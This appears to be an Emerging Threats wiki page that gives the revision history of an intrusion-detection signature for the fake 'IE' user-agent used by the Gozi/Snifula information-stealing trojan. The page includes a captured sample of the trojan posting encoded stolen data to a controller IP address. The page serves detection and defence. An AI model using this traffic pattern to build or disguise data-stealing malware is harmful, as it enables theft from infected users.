alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET USER_AGENTS Suspicious User-Agent (IE)"; flow:to_server,established; content:"User-Agent|3a| IE|0d 0a|"; http_header; threshold:type limit,count 2,track by_src,seconds 300; metadata: former_category TROJAN; reference:url,doc.emergingthreats.net/bin/view/Main/2008255; classtype:trojan-activity; sid:2008255; rev:9; metadata:affected_product Any, attack_target Client_Endpoint, deployment Perimeter, tag User_Agent, signature_severity Major, created_at 2010_07_30, updated_at 2017_10_30;)

Added 2017-10-30 18:17:31 UTC


alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET USER_AGENTS Suspicious User-Agent (IE)"; flow:to_server,established; content:"User-Agent|3a| IE|0d 0a|"; http_header; threshold:type limit,count 2,track by_src,seconds 300; metadata: former_category TROJAN; reference:url,doc.emergingthreats.net/bin/view/Main/2008255; classtype:trojan-activity; sid:2008255; rev:9; metadata:affected_product Any, attack_target Client_Endpoint, deployment Perimeter, tag User_Agent, signature_severity Major, created_at 2010_07_30, updated_at 2017_10_30;)

Added 2017-10-30 16:39:40 UTC


alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN Suspicious User-Agent (IE)"; flow:to_server,established; content:"User-Agent|3a| IE|0d 0a|"; http_header; threshold:type limit,count 2,track by_src,seconds 300; reference:url,doc.emergingthreats.net/bin/view/Main/2008255; classtype:trojan-activity; sid:2008255; rev:8; metadata:affected_product Any, attack_target Client_Endpoint, deployment Perimeter, tag User_Agent, signature_severity Major, created_at 2010_07_30, updated_at 2016_07_01;)

Added 2017-08-07 21:01:25 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Suspicious User-Agent (IE)"; flow:to_server,established; content:"User-Agent|3a| IE|0d 0a|"; http_header; threshold:type limit,count 2,track by_src,seconds 300; reference:url,doc.emergingthreats.net/bin/view/Main/2008255; classtype:trojan-activity; sid:2008255; rev:7;)

Added 2011-10-12 19:24:45 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Suspicious User-Agent (IE)"; flow:to_server,established; content:"User-Agent|3a| IE|0d 0a|"; http_header; threshold:type limit,count 2,track by_src,seconds 300; classtype:trojan-activity; reference:url,doc.emergingthreats.net/bin/view/Main/2008255; sid:2008255; rev:7;)

Added 2011-09-14 22:38:13 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET USER_AGENTS Suspicious User-Agent (IE)"; flow:to_server,established; content:"User-Agent|3a| IE|0d 0a|"; http_header; classtype:trojan-activity; reference:url,doc.emergingthreats.net/bin/view/Main/2008255; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENTS_Suspicious; sid:2008255; rev:6;)

Added 2011-02-04 17:27:21 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET USER_AGENTS Suspicious User-Agent (IE)"; flow:to_server,established; content:"|0d 0a|User-Agent\: IE|0d 0a|"; classtype:trojan-activity; reference:url,doc.emergingthreats.net/bin/view/Main/2008255; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENTS_Suspicious; sid:2008255; rev:4;)

Added 2009-10-19 09:15:44 UTC

The Gozi/Snifula/Ordergun information stealing trojan characteristically uses the fake "IE" UAS when posting data to the controller. Example:

-- DarrenSpruell - 02 Nov 2009

Example:

POST /cgi-bin/forms.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------5f4895f4895f489
User-Agent: IE
Host: 91.213.94.130
Content-Length: 482
Cache-Control: no-cache

----------------------------5f4895f4895f489
Content-Disposition: form-data; name="upload_file"; filename="1835634572.9"
Content-Type: application/octet-stream

URL: http://212.142.72.4/zdozvkg.htm
a=AQAAAJJOP1OGAkDaXpFjrKh0Q-dgg2jPXSB_i0SjJ0LvMLIGOz4OhzLp4dOVbRefJ2yNmUahBP1Nuamabeg-1VhtoJAEAhx7EFLYHFPoSPmrA-OrHFHcKLYFX2rMh541-RnfS3JsJxD0alz8CqkPF03XZVEmhaJcU6tC2MopZCbLRNxULmV657jnajimKZQ-mkp8d9ZVO-eb94IcCCxxr5NtSF93&b=AAAAAA
----------------------------5f4895f4895f489--

-- DarrenSpruell - 02 Nov 2009


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET USER_AGENTS Suspicious User-Agent (IE)"; flow:to_server,established; content:"|0d 0a|User-Agent\: IE|0d 0a|"; classtype:trojan-activity; reference:url,doc.emergingthreats.net/bin/view/Main/2008255; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENTS_Suspicious; sid:2008255; rev:4;)

Added 2009-10-19 09:15:44 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Suspicious User-Agent (IE)"; flow:to_server,established; content:"|0d 0a|User-Agent\: IE|0d 0a|"; classtype:trojan-activity; reference:url,doc.emergingthreats.net/bin/view/Main/2008255; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_USER_Agents; sid:2008255; rev:2;)

Added 2009-02-09 22:22:08 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Suspicious User-Agent (IE)"; flow:to_server,established; content:"|0d 0a|User-Agent\: IE|0d 0a|"; classtype:trojan-activity; sid:2008255; rev:1;)

Added 2008-05-23 10:08:50 UTC


Topic revision: r2 - 2009-11-02 - DarrenSpruell
 
This site is powered by the TWiki collaboration platform Powered by Perl This site is powered by the TWiki collaboration platformCopyright © Emerging Threats